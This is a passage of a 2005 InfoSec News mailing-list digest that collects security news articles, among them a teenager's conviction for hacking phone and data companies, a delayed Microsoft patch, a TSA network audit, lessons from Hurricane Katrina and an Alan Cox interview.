bolster network security, said Baklarz. Also, not all of the Web sites that the Red Cross has created for remote field offices set up to aid Katrina victims have a direct link back to the organization's network. "We are trying to put Web-based applications out there that can be accessed without people coming to the corporate network," Baklarz said without elaborating. The Red Cross is working with the FBI Internet Fraud Complaint Center to shut down sites allegedly created by scam artists involved in Katrina-related fraud. "We anticipated there would be a lot of fraudulent activity on the Internet," Baklarz said. "We wanted to triage with the FBI and make sure they saw examples of the legitimate e-mail that is sent out from the Red Cross so that they know what to look for." Appeals have also been sent to organizations such as Bethesda, Md.-based SANS Institute and various government and nongovernmental agencies to keep an eye out for anything that looks like a scam, Baklarz said. As of last Thursday, about 20 such sites had been identified and were being investigated by the FBI for possible follow-up action. "Every time an event like this occurs, it brings out the best and the worst in people," Baklarz said. "Unfortunately, in my position, I've got to think about and respond to the worst." From isn at c4i.org Tue Sep 13 02:41:23 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 13 02:50:01 2005 Subject: [ISN] Massachusetts Teen Convicted for Hacking into Internet and Telephone Service Providers and Making Bomb Threats Message-ID: http://www.govtech.net/magazine/channel_story.php/96608 By News Staff Sept 11, 2005 A Massachusetts juvenile pled guilty in federal court and was sentenced Thursday in connection with a series of hacking incidents into Internet and telephone service providers; the theft of an individual's personal information and the posting of it on the Internet; and making bomb threats to high schools in Florida and Massachusetts; all of which took place over a 15-month period. Victims of the juvenile's conduct have suffered a total of approximately $1 million in damages, according to a release from the U.S. Attorney's Office. United States Attorney Michael J. Sullivan for the District of Massachusetts; United States Attorney H. E. Bud Cummins, III for the Eastern District of Arkansas; United States Attorney R. Alexander Acosta for the Southern District of Florida; Steven D. Ricciardi, Special Agent in Charge of the U.S. Secret Service in New England; Kenneth W. Kaiser, Special Agent in Charge of the Federal Bureau of Investigation in New England; William Sims, Special Agent in Charge of the Secret Service in Miami, Florida; and William C. Temple, Special Agent in Charge of the Federal Bureau of Investigation in Little Rock, Arkansas, announced today that in a sealed court proceeding a Massachusetts teenager pled guilty before U.S. District Judge Rya W. Zobel to an Information charging him with nine counts of juvenile delinquency. By statute, federal juvenile proceedings and the identity of juvenile defendants are under seal. The Court has authorized limited disclosure in this case at the request of the government and defendant. Judge Zobel also imposed a sentence today of 11 months' detention in a juvenile facility, to be followed by two years of supervised release. During his periods of detention and supervised release, the juvenile is also barred from possessing or using any computer, cell phone or other electronic equipment capable of accessing the Internet. Had the juvenile been an adult, the underlying charges would have been charged as three counts of making bomb threats against a person or property, three counts of causing damage to a protected computer system, two counts of wire fraud, one count of aggravated identity theft, and one count of obtaining information from a protected computer in furtherance of a criminal act. "Computer hacking is not fun and games," stated U.S. Attorney Sullivan. "Hackers cause real harm to real victims as graphically illustrated in this case." "Would-be hackers, even juveniles when appropriate, should be put on notice that such criminal activity will not be tolerated and that stiff punishments await them if they are caught." As a result of this bomb threat, the school was closed for two days, while a bomb squad, a canine team, the fire department and Emergency Medical Services were called in. In August, 2004, the juvenile logged into the Internet computer system of a major Internet Service Provider ("ISP") using a program he had installed on an employee's computer. This program allowed the juvenile to use the employee's computer remotely to access other computers on the internal network of the ISP and gain access to portions of the ISP's operational information. In January, 2005, the juvenile gained access to the internal computer system of a major telephone service provider that allowed him to look up account information of the telephone service provider's customers. He used this computer system to discover key information about an individual who had an account with the telephone service. He then accessed the information stored on this individual's mobile telephone, and posted the information on the Internet. During this same time period, the juvenile used his access to the telephone company's computer system to set-up numerous telephone accounts for himself and his friends, without having to pay for the accounts. Also in January, 2005, an associate of the juvenile set-up accounts for the juvenile at a company which stores identity information concerning millions of individuals allowing the juvenile to look at the identity information for numerous individuals, some of which he used for the purpose of looking up the account information for the victim whose personal information he posted on the Internet. In the spring of 2005, the juvenile, using a portable wireless Internet access device, arranged with one or more associates to place a bomb threat to a school in Massachusetts and local emergency services, requiring the response of several emergency response units to the school on two occasions and the school's evacuation on one. In June, 2005, the juvenile called a second major telephone service provider because a phone that a friend had fraudulently activated had been shut off. In a recorded telephone call, the juvenile threatened the telephone service provider that if the provider did not provide him access to its computer system, he would cause its Web service to collapse through a denial of service attack -- an attack designed to ensure that a Website is so flooded with request for information that legitimate users cannot access the Website. The telephone service provider refused to provide the requested access. Approximately ten minutes after the threat was made, the juvenile and others initiated a denial of service attack that succeeded in shutting down a significant portion of the telephone service provider's Web operations. From isn at c4i.org Tue Sep 13 02:41:36 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 13 02:50:24 2005 Subject: [ISN] Experts unconcerned over Microsoft patch delay Message-ID: http://news.zdnet.co.uk/internet/security/0,39020375,39217821,00.htm Tom Espiner ZDNet UK September 12, 2005 The decision to delay to the latest Windows patch has been praised by the security industry Security experts are largely unconcerned about the delay to Microsoft's latest critical security patch, as they believe hackers will struggle to exploit the vulnerabilities that the patch was meant to fix. The patch was due to be released on Tuesday, but was pulled on Friday after Microsoft "encountered a quality issue that necessitated the update to go through additional testing and development before it is released", according to the company Web site. Mikko Hypp?nen, director of antivirus research at Finnish security company F-Secure, said as the bug existed in Microsoft software before the company announced a fix, there is no difference to the security risk facing Windows users today. "There are not suddenly going to be hundreds of underground hackers just concentrating on finding this one security flaw, I think," Hypp?nen said. Hypp?nen was glad that Microsoft had decided to not release a patch with bugs. "I prefer it this way," he said. "It would generate more problems if Microsoft released a buggy patch. Most exploits exploit an existing patch." If a buggy patch that many users chose not to install were released, hackers could examine that patch to find the flaws in the original software, Hypp?nen said, whereas "at the moment it's like shooting in the dark" for the hackers. Graham Cluley, senior technology consultant at security company Sophos, agreed. "At the moment there's not much information on the vulnerability. It's better that Microsoft not roll out [the update] than roll it out flawed. Obviously we're keen to get the update, and [the announcement that no update would be available] was a bit up against the wire, but it's better that Microsoft stopped the release," he said. "As long as no information leaks out from Microsoft, we don't think there's much risk to users. As far as we know there are no exploits out there for the current flaw," Cluley said. "Obviously this will cause some embarrassment to Microsoft ? they've said to us there will be an update, then turned around and said 'Whoops, not just yet', but we don't think there's much risk to users," he said. As to when the patch would be released, Cluley said "Microsoft may decide to release the patch in a month, but hopefully they'll release it as soon as it's ready." Hypp?nen concurred. "They [Microsoft] might simply release it next month," he said. All the experts questioned declined to speculate as to which part of Windows was addressed by the update. "There are so many potential holes I couldn't possibly guess which one it's for," joked Alex Shipp, chief antivirus developer for MessageLabs. From isn at c4i.org Tue Sep 13 02:45:31 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 13 02:50:47 2005 Subject: [ISN] Microsoft rejects S. Korea's demand for continued security patches Message-ID: http://english.yna.co.kr/Engnews/20050913/460100000020050913145408E9.html 2005/09/13 SEOUL, Sept. 13 (Yonhap) -- Software giant Microsoft Corp. has rejected South Korea's intelligence agency's request that a planned halt to security patch releases for a version of the Windows operating system be postponed, according to the spy agency's cyber security team Tuesday. The National Cyber Security Center, affiliated with the National Intelligence Service, said its demands for Microsoft to extend the release of Windows 98 security patches were met with refusals. From isn at c4i.org Tue Sep 13 02:40:31 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 13 02:51:07 2005 Subject: [ISN] Linux Security Week - September 12th 2005 Message-ID: +---------------------------------------------------------------------+ | LinuxSecurity.com Weekly Newsletter | | September 12th, 2005 Volume 6, Number 38n | | | | Editorial Team: Dave Wreski dave@linuxsecurity.com | | Benjamin D. Thomas ben@linuxsecurity.com | +---------------------------------------------------------------------+ Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headlines. This week, perhaps the most interesting articles include "Security moves back into top 5 IT priorities," "Popular policies: keeping storage secure," and "The Mobility Threat." --- ## Master of Science in Information Security ## Earn your Master of Science in Information Security online from Norwich University. Designated a "Center of Excellence", the program offers a solid education in the management of information assurance, and the unique case study method melds theory into practice. Using today's e-Learning technology, you can earn this esteemed degree, without disrupting your career or home life. LEARN MORE: http://www.msia.norwich.edu/linux_en --- LINUX ADVISORY WATCH This week, advisories were released for proftpd, sqwebmail, polygen, affix, zsync, phpgroupware, webcalendar, pcre3, ntp, cvs, kdelibs, evince, openmotif, cman, gnbd-kernel, dlm-kernel, lockdev, perl, termcap, ckermit, kdegraphics, squid, pam, setup, tar, openssh, tzdata, httpd, mplayer, and phpldapadmin. The distributors include Debian, Fedora, Gentoo, and Red Hat. http://www.linuxsecurity.com/content/view/120342/150/ --- Hacks From Pax: PHP Web Application Security By: Pax Dickinson Today on Hacks From Pax we'll be discussing PHP web application security. PHP is a great language for rapidly developing web applications, and is very friendly to beginning programmers, but some of its design can make it difficult to write web apps that are properly secure. We'll discuss some of the main security "gotchas" when developing PHP web applications, from proper user input sanitization to avoiding SQL injection vulnerabilities. http://www.linuxsecurity.com/content/view/120043/49/ --- Network Server Monitoring With Nmap Portscanning, for the uninitiated, involves sending connection requests to a remote host to determine what ports are open for connections and possibly what services they are exporting. Portscanning is the first step a hacker will take when attempting to penetrate your system, so you should be preemptively scanning your own servers and networks to discover vulnerabilities before someone unfriendly gets there first. http://www.linuxsecurity.com/content/view/119864/150/ --- >> The Perfect Productivity Tools << WebMail, Groupware and LDAP Integration provide organizations with the ability to securely access corporate email from any computer, collaborate with co-workers and set-up comprehensive addressbooks to consistently keep employees organized and connected. http://ads.linuxsecurity.com/cgi-bin/newad_redirect.pl?id=gdn05 --> Take advantage of the LinuxSecurity.com Quick Reference Card! --> http://www.linuxsecurity.com/docs/QuickRefCard.pdf +---------------------+ | Security News: | <<-----[ Articles This Week ]---------- +---------------------+ * IptablesWeb v.1.0 8th, September, 2005 IptablesWeb is a free software (under GPL licence): it makes possible to inspect iptables logs by using a web browser. It's a plugin-based multilanguage software written in PHP using 3 free php classes. http://www.linuxsecurity.com/content/view/120297 * Creating info society: Broadband and info security 6th, September, 2005 The explosion of spamming, hoaxes and cyber attacks has highlighted just how vulnerable users are to security breaches and the steps they need to take to protect themselves. While both dial-up and broadband connections can be affected by such security breaches, an always-on broadband connection is undoubtedly an easier target. This is because the always-on nature of a broadband connection means that attacks and hacking can happen around the clock, raising the stakes by comparison with a computer that is only on for short periods. Luckily, there are many tools available to make broadband connections secure and attractive to users and potential users. http://www.linuxsecurity.com/content/view/120310 * Big debate over small packets 8th, September, 2005 Fernando Gont is nothing if not tenacious. Earlier this year, the Argentinian researcher highlighted several attacks that could disrupt network connections using the Internet control message protocol, or ICMP, and proposed four changes to the structure and handling of network-data packets that would essentially eliminate the risk. http://www.linuxsecurity.com/content/view/120329 * Cisco Issues Fixes for Vulnerable Web Routers 8th, September, 2005 Cisco alerted its customers Wednesday about a serious security flaw in many of its Internet routers, which serve as key intersections in channeling Web and e-mail traffic from point to point. Cisco Systems Inc., based in San Jose, Calif., warned that attackers could use the flaw to seize control over specified vulnerable routers.not most routers currently in use. http://www.linuxsecurity.com/content/view/120333 * MS wrong on security claims: Red Hat 6th, September, 2005 Red Hat is accusing Microsoft of getting its facts wrong in its latest attack on Linux security. In an update on security at Microsoft's recent world-wide partner conference, the company's security head Mike Nash took aim at Linux to single out Red Hat. http://www.linuxsecurity.com/content/view/120309 * OpenSSH update fixes recent vulnerabilities 5th, September, 2005 The first fix prevents "GatewayPorts" from being "incorrectly activated for dynamic ('-D') port forwardings when no listen address was explicitly specified," according to the changelog. http://www.linuxsecurity.com/content/view/120299 * Red Hat Unveils IT Courses 7th, September, 2005 Red Hat, the world's leading provider of open source solutions to the Enterprise, announced the addition of Institute of Advanced Computing Management (IACM) to their Authorised Training Partner Network, which extends across India, Nepal, Bangladesh, Sri Lanka and Pakistan. Red Hat's complete range of Training and Certification programs will now be available at IACM.

http://www.linuxsecurity.com/content/view/120320 * Security moves back into top 5 IT priorities 7th, September, 2005 With Labor Day weekend quickly vanishing into a memory, the team has just finished compiling this month's IT priorities data. The big news is that what happened last month with security is now pretty much undone. It is back in the top 5 list, just barely edging out IT management for the fifth position (it was in fourth back in July). Software infrastructure and hardware upgrades also swapped positions and are in second and third respectively. As usual, wired and wireless projects are up on top as organizations buy into data and voice network convergence and install wireless networking equipment. Overall, things are looking good. According to the US Commerce Department, in Q2 2005, businesses spent 17.3% more on computers and peripheral equipment than they did in Q2 2004. http://www.linuxsecurity.com/content/view/120321 * Email security - what are the issues? 8th, September, 2005 As email becomes more prevalent in the market, the importance of email security becomes more significant. In particular, the security implications associated with the management of email storage, policy enforcement, auditing, archiving and data recovery. http://www.linuxsecurity.com/content/view/120331 * Popular policies: keeping storage secure 9th, September, 2005 Secure storage of data has always been essential for any organisation, of whatever size. In the past this involved accurate filing of paper records, and then keeping the physical archive secure . whether it was simply locking a filing cabinet, or guarding an entire building. http://www.linuxsecurity.com/content/view/120345 * The Mobility Threat 5th, September, 2005 We live in an era where mobile devices are being used by all levels of society. Today, it is fairly common to see a CEO or a school kid carrying a PDA or mobile phone. According to a survey by Infocomm Authority of Singapore (IDA), the penetration rate of mobile phones in Singapore has grown to 91 percent in 2004. Sophisticated PDA phones and other mobile devices such as the Blackberry are actually miniaturised PCs and they have become ubiquitous. http://www.linuxsecurity.com/content/view/120300 ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------ From isn at c4i.org Wed Sep 14 04:28:19 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 14 04:33:38 2005 Subject: [ISN] Teen Pleads Guilty to Hacking Paris Hilton's Phone Message-ID: http://www.washingtonpost.com/wp-dyn/content/article/2005/09/13/AR2005091301423.html By Brian Krebs washingtonpost.com Staff Writer September 13, 2005 A Massachusetts teenager has pleaded guilty to hacking into the cell-phone account of hotel heiress and Hollywood celebrity Paris Hilton, a high-profile stunt by the youngest member of the same hacking group federal investigators say was responsible for a series of electronic break-ins at data giant LexisNexis. The 17-year-old boy was sentenced to 11 months' detention at a juvenile facility for a string of crimes that include the online posting of revealing photos and celebrity contact numbers from Hilton's phone. As an adult, he will then undergo two years of supervised release in which he will be barred from possessing or using any computer, cell phone or other electronic equipment capable of accessing the Internet. The U.S. Attorney's Office for Massachusetts and the state district court declined to identify the teen, noting that federal juvenile proceedings and the identity of juvenile defendants are under seal. But a law enforcement official close to the case confirmed that the crimes admitted to by the teen included the hacking of Hilton's account. The teen also pleaded guilty to making bomb threats at two high schools and for breaking into a telephone company's computer system to set up free wireless-phone accounts for friends. He also participated in an attack on data-collection firm LexisNexis Group that exposed personal records of more than 300,000 consumers. Prosecutors said victims of the teen's actions have suffered about $1 million in damages. In a series of telephone and online communications between March and June with a washingtonpost.com reporter, the teen acknowledged responsibility for all of the crimes for which he was sentenced. Washingtonpost.com is not revealing his name because he communicated with the reporter on the condition that he not be identified either directly or through his online alias. Investigators began focusing on the teen in March 2004 when he sent an expletive-laced e-mail to a high school in Florida threatening to blow it up, according to a statement from prosecutors. The school was closed for two days while a bomb squad, a canine team, the fire department and and other emergency officials examined the building. In August 2004, the teen broke into the internal computer systems of "a major internet service provider" by tricking an employee into opening a virus-infected file he sent as an e-mail attachment. The virus -- known as a "Trojan horse" program -- allowed the juvenile to use the employee's computer remotely to access other computers on the ISP's internal network and gain access to portions of the company's operational information, prosecutors said. The teen told washingtonpost.com earlier this year that around that time he broke into the network of Dulles, Va.-based America Online. AOL did not return calls seeking comment. In January, the teen hacked into the telephone records system of T-Mobile International. He used a security flaw in the company's Web site that allowed him to reset the password of anyone using a Sidekick, a pricey phone-organizer-camera device that stores videos, photos and other data on T-Mobile's central computer servers. A month later, the teen would use that flaw to gain access to Hilton's Sidekick files, according to corroborating information and screen shots he shared with washingtonpost.com. Later that month, according to prosecutors, an associate of the teen "set up accounts for the juvenile at a company which stores identity information concerning millions of individuals." Again, prosecutors declined to name the company targeted in that attack. But according to screen shots provided by the teen -- supported by other information from the teen that was verified by a senior federal law enforcement official investigating the case who spoke on condition on anonymity -- the company was LexisNexis, which reported in March that hackers had gained access to the personal records of more than 310,000 Americans. An adult member of the hacker group acknowledged in phone conversations with a washingtonpost.com reporter that he collaborated with the teen in sending hundreds of e-mails with an explicit image and a message urging recipients to open an attached file to view additional pornographic images of children. According to both hackers, a police officer in Florida was among those who opened the e-mail attachment, which harbored a virus-like program that allowed the hackers to record anything a victim typed on his or her computer keyboard. Not long after his computer was infected with the keystroke-capturing program, the officer logged on to his police department's account at Accurint, a LexisNexis service provided by Florida-based subsidiary Seisint Inc., which sells access to consumer data. The teen said the group members then created a series of sub-accounts using the police department's name and billing information. Over the period of several days, the group looked up thousands of names in the database, including those of friends and celebrities. Then in June, according to prosecutors, he called "a major telephone service provider because a phone that a friend had fraudulently activated had been shut off." (A washingtonpost.com reporter was invited to listen in on the call, which was made to Little Rock-based Alltel Corp.) When the company refused to provide the requested access, the teen threatened to cripple its Web site with a "distributed denial of service" attack, in which attackers use the Internet bandwidth of hundreds or thousands of remote-controlled computers to overwhelm a site with so much traffic that it can no longer accommodate legitimate visitors. Roughly 10 minutes later the teen and others "initiated a denial of service attack that succeeded in shutting down a significant portion of the telephone service provider's web operations," according to the prosecutors. The Justice Department said the investigation of the teen's associates is continuing, but it remains unclear how many of those individuals will be prosecuted. In May, Secret Service and FBI officials served search warrants on at least nine people thought to be connected to the hacking ring of which the teen was a member, known as the "Defonic Team Screen Name Club" or "DFNCTSC" for short. The teen is likely to be required as a condition of his plea agreement to cooperate with the government in their ongoing investigation and provide information not only about how the attacks were carried out, but who else was involved and what their roles were, said Mark D. Rasch, senior vice president at McLean, Va.-based online security firm Solutionary Inc. and a former federal prosecutor for computer crimes. According to interviews with at least two other former members of the group, investigators now are focusing on the individual who helped the teen gain access to LexisNexis. "They came and took my laptop and asked a whole bunch of questions about him," a former group member known online as "DJint" said. "They told me they're looking to go after him for access-device fraud and possession of child pornography." Still, Rasch said, it could be some time before the government wraps up its investigation into these attacks. "Investigations of computer crimes are particularly difficult because they always involve many different types of evidence from numerous locations, and they require cooperation from many different organizations," Rasch said. "It's hard work." ? 2005 Washingtonpost.Newsweek Interactive From isn at c4i.org Wed Sep 14 04:28:36 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 14 04:33:56 2005 Subject: [ISN] Report: Gaps persist in TSA network security Message-ID: http://www.washingtontechnology.com/news/1_1/daily_news/26983-1.html By Alice Lipowicz Staff Writer 09/13/05 The Transportation Security Administration has improved its network security, but the agency still cannot ensure that critical computer network operations and data are protected from hackers and can be restored following an emergency, according to a new report [1] from the Homeland Security Department's Office of the Inspector General. The TSA falls short in developing and implementing processes such as security testing, monitoring with audit trails, configuration and patch management, and password protection, the report said. Also, contingency plans have not been made final nor tested. "TSA has taken actions and made progress in securing its networks," states the redacted version of the report. "However, TSA can make further improvements to secure its networks." Computer networks are vital to homeland security for sharing information among government agencies. But they also contain sensitive data that must be protected from unauthorized access and manipulation from hackers and cyberterrorists. The TSA, which oversees passenger and baggage screening and other security procedures at the nation's airports, shares information with airports through a wide area network. But it lacks a comprehensive security testing program to insure the integrity of that network, the report said. While some vulnerability scans are performed monthly, TSA does not conduct "penetration testing" and "password analysis," and does not test all devices connected to the network as recommended, the report said. "Security vulnerabilities continue to exist because TSA has not implemented a comprehensive testing program to identify obsolete software versions or applicable patches on its network devices," the inspector general wrote. The report recommended testing to include "periodic network scanning, vulnerability scanning, penetration testing, password analysis and war driving." TSA officials agreed with the advice, according to the report. TSA has strengthened security configurations on its servers and workstations in comparison to what was found in a previous audit, the report said. However, the agency still needs to make improvements including detailed configuration procedures, development of a patch management policy, implementing a strong password policy and secure configuration of routers. The audit found a list of accounts on two TSA workstations that could be accessed without identification and authentication, a vulnerability which could be exploited by a hacker. On patch management, the audit discovered that TSA relies on the patch management procedures developed by the contractor responsible for network management, and it recommended that the agency develop its own documented policy. The inspector general scolded TSA for allowing multiple users to share passwords for several administrative accounts, and it also pointed out that TSA's draft password policy does not comply with the Homeland Security Department's requirements for strong passwords. [1] http://www.dhs.gov/interweb/assetlibrary/OIGr_05-31_Aug05.pdf From isn at c4i.org Wed Sep 14 04:29:30 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 14 04:34:16 2005 Subject: [ISN] Katrina: a tough lesson in security Message-ID: http://www.theregister.co.uk/2005/09/13/katrina_security_lessons/ By Mark Rasch SecurityFocus 13th September 2005 In the waning days of August, a massive category four hurricane devastated the gulf coast of the United States, particularly devastating the city of New Orleans. In addition to the estimated $50bn in property damage, clean-up and reconstruction costs, and the hundreds of likely dead, and tens of thousands displaced, the hurricane and its aftermath have disrupted businesses throughout the southern United States. From this disaster, there are a few lessons IT staff, and IT security staff, as well as senior management should learn. The sad thing is that many won't take these lessons to heart. 1. Infrastructure is important Much of the devastation resulting from hurricane Katrina, particularly to the city of New Orleans, resulted not from the initial wind damage, but from the collapse of key portions of the infrastructure which were not designed to withstand an event that, at least in retrospect, was eminently predictable, if not inevitable. The collapse of key levees in the Big Easy caused tens of millions of dollars of damage and loss because they were designed to withstand only a category three hurricane. In most companies, the IT infrastructure has grown organically, based upon the needs or perceived needs of individual business units. Thus, the mix of hardware and software, applications, technologies and processes are generally not mapped, and generally not adequate. Most entities do not know what technologies that they have employed, what software (or versions) they are using, or even what the scope and extent of their network looks like. In addition, in most enterprises, "security" is a discrete item - it's an add-on, often an afterthought, yet it's frequently mentioned in one of those, "oh by the way" telephone calls after some new application is about to go (or has already gone) live. Infrastructure is fragile and brittle. Survivability, redundancy, and security have to be built into it at the outset. An elegant network or application is of no use if it is destroyed, insecure, or inoperable. Duh. 2. Infrastructures are co-dependant We typically think of IT as a single infrastructure, but it is not. Perhaps if your network and the Internet are seen as one of the same, it's easier to explain all those security breaches on "your" network. When the hurricane took down the electricity, the oil and natural gas refineries on the mainland of the gulf coast could not operate, nor could the pumping stations pump any oil or gas. A single catastrophic event will likely lead to the disruption of multiple infrastructures, each dependent upon each other. The same is true for both IT and IT security. Electricity, telecommunications, Internet, transportation, and people are all co-dependent. Knowledge of these facts should inform not only your disaster recovery plans, but also your initial design. Don't forget that hardware, software, policy, planning and training are also key elements of your infrastructure. 3. Prevention is cheaper than response (usually) Much of the work of prevention - knowing what the risks to the enterprise are, and mitigating these risks where it's cost-effective - can and should be done long before any attack or disaster affects an enterprise. It has been estimated that the costs of responding to an attack, including personnel costs, data recovery costs, diversion of attention from other priorities, direct economic damage and theft, and costs that damage one's reputation are often from 10 to 100 times the cost of preventing the damage in the first place. Right now, the tens of millions of dollars it would have cost to shore up and improve the levees looks like a sound investment. A month ago, it was government pork barrel spending. We typically tie IT security spending to a percentage of the overall IT budget, and then value security based upon the value of the IT infrastructure. Why spend $50,000 to secure an IT asset that itself only cost (or is worth) $5,000? This is the wrong way to analyze the situation. We need to address the cost not of the IT itself, but the value of the information that is being processed by, stored on, or transmitted through the infrastructure. The correct questions to ask are: "What would happen to my enterprise if this information was lost? Corrupted? Stolen? Unavailable?" What would happen to the company's reputation? To the ability to deliver services? Remember that in security we are protecting companies and agencies, not computers. 4. Cost of response is shifted A typical axiom in the tort law of negligence is that we impose the liability upon the party or entity best able to avoid the damage or risk. In the case of the New Orleans flooding, this would have been some combination of the local, state and federal governments, including the U.S. Army Corps of Engineers, and of course, the United States Congress that funds these projects, as well as the electorate that votes for these Members of Congress. Had better, stronger and more durable levees been constructed and maintained, billions of dollars of damage could have been prevented. However, in most situations, the people bearing the risk of loss are not the same people who have to make the decisions about prevention. Homeowners in New Orleans essentially had little say about whether the levees were built (although they could have chosen to live elsewhere - like San Francisco or Sri Lanka?) What is worse, drivers in Washington, D.C., those who are now paying $3.70 a gallon for gas that was just $2.50 before the hurricane, previously had little reason to support plans to build stronger levees or redundant distribution centers on the gulf coast. Operators of the closed Houston Astrodome also had little reason to appreciate the effects of a hurricane in Louisiana on their facility. In IT attacks, the same is true. The people whose information is affected by the attack may be distant - temporally, proximally or otherwise - from the decisions about whether or how to secure the IT. The cost of prevention may come from the IT budget, but the benefit goes to other business units' productivity and it is rarely captured. The same is true for the costs of avoidance. We need better metrics for the TRUE cost of NOT providing adequate security, and then we will be better able to make informed decisions about how much to spend on security. 5. Insurance is important In the aftermath of hurricane Katrina, many individuals who thought they had insurance (because they had been paying thousands of dollars in premiums, for years) to cover damages resulting from the hurricane find that they may not be insured for the damages. This is because most insurance policies have specific riders excluding coverage for damage resulting from "flooding." So if a hurricane blows out a levee causing water to crash into and submerge your house, the damage, although caused by a hurricane, may not be covered. Many insurance companies offer various forms of insurance to protect key parts of the IT infrastructure. These include general business interruption insurance, reputation insurance, theft, damage or loss insurance, critical document insurance, and various forms of cyber-insurance. However, these policies contain riders and exclusions that are often confusing and mutually contradictory. If there is "physical damage" to a computer that holds your critical documents, you may be covered, but "logical damage" may not be covered. If the hard drives are wiped out by a flood it may be covered, and similarly if they're wiped by a magnet or a power surge they may be covered - but if they're wiped by a virus or worm, they are excluded. Thus, in conducting risk assessment it is important to review all of your insurance policies (including your D&O policies) to make sure you have appropriate coverage. Also remember that when you are reducing your risk by implementing a comprehensive IT security program, you are also reducing the risk of your insurance company who ultimately would have to pay for covered losses. As a result, just as when you put in a smoke alarm or burglar alarm, you should contact the insurance company when you plan to make significant changes in your security to see whether they will reduce your premiums -- or better yet, pay for the improvements directly. Some companies, particularly those that offer cyber-insurance policies, will even pay for comprehensive audits or assessment themselves. Free security? What could be better? 6. Backup, backup and backup The day before I go to the dentist, I try to do about six months worth of flossing and brushing. Sure, we all know we need to do this, and there is nothing sexy about having a plan for backups, but we frequently don't do them properly - not only at the corporate level, but at the personal level as well. The hurricane also taught us that many of our plans for data recovery and disaster recovery may be too limited. For example, prior to September 11, 2001, both the federal, state and city disaster centers were located in close proximity to each other for planning, coordination and communications purposes. These were, of course, located in the World Trade Center. Not a bad decision to start with, but a very unfortunate result. Similarly, we often have wonderful backup plans to backup data and store it at a remote location just a few blocks or miles away. In the wake of the hurricane, we need to reconsider these decisions. Work locally and backup globally. Of course, this creates new problems. The more distributed information becomes, the more vulnerable it is to attack, disruption, and to the legal processes of the country in which it is located. Outsourcing data storage may solve some of these problems, but it may also create new problems itself. There are all fun things to think about. 7. Training and testing The ultimate defense against disaster are well trained and well equipped people. Too few companies bother to train their employees to recognize cyber attacks, and to respond appropriately to them. All the technology in the world won't help unless people know it exists and know how and when to use it. Awareness and training are critical to success. A cyber attack, like the breach of the New Orleans levees, is more than likely. The best enterprises will be prepared, and therefore will survive. Copyright ? 2004 -=- SecurityFocus columnist Mark D. Rasch, J.D., is a former head of the Justice Department's computer crime unit, and now serves as Senior Vice President and Chief Security Counsel at Solutionary Inc. From isn at c4i.org Wed Sep 14 04:30:01 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 14 04:35:53 2005 Subject: [ISN] Data dangers dog hard drive sales Message-ID: http://news.bbc.co.uk/2/hi/technology/4229550.stm 12 September 2005 Many people are taking risks with data on hard drives and memory cards which they are selling via eBay, say experts. Letters, resumes, spreadsheets, phone numbers and e-mail addresses were all found on storage hardware bought and analysed by forensics firm Disklabs. Also recoverable were temporary files from net browsers which contained login details and passwords for websites and even online bank accounts. The problems arose because sellers were only taking basic steps to delete data. Key change In its test of how good users were at destroying data, Disklabs bought 100 hard drives and 50 memory cards - which included SD cards, flash drives, sim cards and memory sticks - from the auction site. Simon Steggles, director of Disklabs, said the drives and memory cards were probably being sold by people upgrading home PCs or changing their mobile phone. "Most people made only cursory attempts to erase the data," said Mr Steggles, "and some had not done even that." During its investigation, Disklabs found large amounts of personal and confidential business data on storage hardware. Most worryingly, said Mr Steggles, it was possible to extract the temporary files that Microsoft's Internet Explorer browser uses to keep track of what people do when they are using the web. With a little work, it was possible to reconstruct almost everything that some users did online, and to grab cookies and login details for sites they visited. "With not a massive amount of work we could go in there and help ourselves to whatever we want," he told the BBC website. In many cases, only the delete key was used to remove data. However, in PCs and many other digital devices all this does is apply a label that says these sections of storage can be over-written. On large disk drives this can mean the supposedly deleted data remains intact for a long time. In such cases, said Mr Steggles, recovering data is very straight-forward for forensic firms and, perhaps, technically-aware thieves. What users needed to realise, he said, was how hard it was to destroy data. Even formatting hard drives and other memory cards would not irrevocably remove information stored on them. If users were worried about potentially sensitive data, said Mr Steggles, they should use a professional forensics firm to erase it "Alternatively," he said "they could smash it to bits." From isn at c4i.org Wed Sep 14 04:30:26 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 14 04:36:18 2005 Subject: [ISN] The Next 50 Years of Computer Security: An Interview with Alan Cox Message-ID: http://www.oreillynet.com/pub/a/network/2005/09/12/alan-cox.html by Edd Dumbill 09/12/2005 Author's note: Alan Cox needs little introduction--most will know him for his long-standing work on the Linux kernel (not to mention his appreciation and promulgation of the Welsh language among hackers). Cox is one of the keynote speakers at EuroOSCON this October, where he will talk about computer security. According to Alan Cox, we're just at the beginning of a long journey into getting security right. Eager for directions and a glimpse of the future, O'Reilly Network interviewed him about his upcoming keynote. Edd Dumbill: You're talking about the next 50 years of computer security at EuroOSCON. How would you sum up the current state of computer security? Alan Cox: It is beginning to improve, but at the moment computer security is rather basic and mostly reactive. Systems fail absolutely rather than degrade. We are still in a world where an attack like the slammer worm combined with a PC BIOS eraser or disk locking tool could wipe out half the PCs exposed to the internet in a few hours. In a sense we are fortunate that most attackers want to control and use systems they attack rather than destroy them. ED: Linux sysadmins see a security advisory and fix practically every day now. Is this sustainable, and does it harm Linux that this happens? AC: It isn't sustainable and it isn't going to work forever. Times between bug discovery and exploits have dropped dramatically and better software tools will mean better and faster written exploits, as well as all the good things. I think it harms Linux perhaps less than most systems because Linux security has been better than many rivals. However, even the best systems today are totally inadequate. Saying Linux is more secure than Windows isn't really addressing the bigger issue--neither is good enough. ED: You say that we're only just at the beginning of getting computer security right. What are the most promising developments you see right now? AC: There are several different things going on. Firstly, the once-stagnant world of verification tools has finally begun to take off and people have started to make usable code verification and analysis tools. This helps enormously in stopping mistakes getting into production. Related to this, languages are changing and developing. Many take some jobs away from the programmer and 